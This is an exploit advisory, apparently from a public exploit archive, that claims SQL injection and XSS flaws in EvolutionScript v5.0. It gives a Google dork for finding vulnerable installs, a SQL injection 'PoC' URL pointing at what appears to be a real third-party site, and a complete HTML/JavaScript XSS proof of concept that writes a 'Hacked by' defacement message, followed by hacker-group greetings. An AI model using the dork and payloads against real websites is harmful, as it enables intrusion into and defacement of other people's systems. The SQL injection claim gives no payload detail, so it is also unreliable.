evolutionscript v5.0 Mullti Vulnerability ========================================= Author : indoushka Vondor : http://EvolutionScript.com Dork : Powered by EvolutionScript Version 5.0 Copyright ? 2010 - 2015 EvolutionScript.com ========================= Sql injection : C:\AppServ\www\EvolutionScript\includes\init.php Line 145 mysqli::query $todayis,$user_info['id'] poc: http://www.twickerz.com/bannerclick.php?id=15806 (inject her) Xss : C:\AppServ\www\EvolutionScript\includes\functions.php Line 154 echo $stored XSS ( HTML Inject ) - jQuery v1.8.2 : save the code in name.html and open it <html> <head> <meta charset="utf-8"> <title>XSS ( HTML Inject ) - jQuery v1.8.2 </title> <script src="http://127.0.0.1/EvolutionScript/js/jquery.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee></script></option> </select> </p> </form> </body> </html> Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be ---------------------------------------------------------------------------------------------------------------